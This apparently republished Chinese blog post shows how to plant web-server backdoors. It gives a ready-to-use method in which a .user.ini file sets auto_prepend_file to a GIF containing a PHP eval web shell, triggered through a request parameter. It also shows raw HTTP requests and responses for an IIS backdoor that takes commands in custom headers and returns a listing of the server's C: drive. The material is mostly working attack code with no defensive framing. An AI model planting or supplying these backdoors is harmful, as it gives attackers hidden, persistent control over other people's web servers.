ini和iis后门

2017-01-04 10:32:02来源:作者:Joy_nick人点击

第七城市

.user.ini它比 .htaccess用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。

.user.ini实际上就是一个可以由用户“自定义”的 php.ini,我们能够自定义的设置是模式为“ PHP_INI_PERDIR、 PHP_INI_USER”的设置。和 php.ini不同的是, .user.ini是一个能被动态加载的ini文件。也就是说我修改了 .user.ini后,不需要重启服务器中间件,只需要等待 user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载

利用方法

新建 .user.ini,内容为:

auto_prepend_file=test.gif

新建 test.gif,内容为:

<?php @eval($_REQUEST[shell]);?>

新建 echo.php,内容为:

<?phpecho "PHP is very good!";?>

访问 echo.php即可看到后门:

http://127.0.0.1:8080/php-backdoor/echo.php?shell=phpinfo(); iis后门

iis后门是用了iis本身的机制,当在http头里增加一字段即可触发后门,并执行发过来的命令。

正常情况:

GET /pwet.htm HTTP/1.1Host: 192.168.73.143Accept-Encoding: identityConnection: Keep-AliveContent-type: application/x-www-form-urlencodedAccept: */*HTTP/1.1 200 OKDate: Thu, 03 Feb 2011 12:16:50 GMTContent-Length: 31Content-Type: text/htmlLast-Modified: Mon, 21 Jun 2010 11:53:19 GMTAccept-Ranges: bytesETag: "963779573811cb1:994"Server: Microsoft-IIS/6.0<html>Pouetpouet</html>

加入恶意字段

GET /pwet.htm HTTP/1.1Host: 192.168.73.143Accept-Encoding: identityX-Order: ListDirConnection: Keep-AliveX-Data: QzpcContent-type: application/x-www-form-urlencodedAccept: */*HTTP/1.1 200 OKDate: Thu, 03 Feb 2011 12:16:57 GMTContent-Length: 353X-Resp: OKContent-Type: text/htmlLast-Modified: Mon, 21 Jun 2010 11:53:19 GMTAccept-Ranges: bytesETag: "963779573811cb1:994"Server: Microsoft-IIS/6.0<html>Pouetpouet</html>[F] C:/AUTOEXEC.BAT[F] C:/boot.ini[F] C:/bootfont.bin[F] C:/CONFIG.SYS[D] C:/Documents and Settings[D] C:/Inetpub[F] C:/IO.SYS[F] C:/MSDOS.SYS[F] C:/NTDETECT.COM[F] C:/ntldr[F] C:/pagefile.sys[D] C:/Program Files[D] C:/System Volume Information[D] C:/WINDOWS[D] C:/wmpub
第七城市

最新文章

123

最新摄影

微信扫一扫

第七城市微信公众平台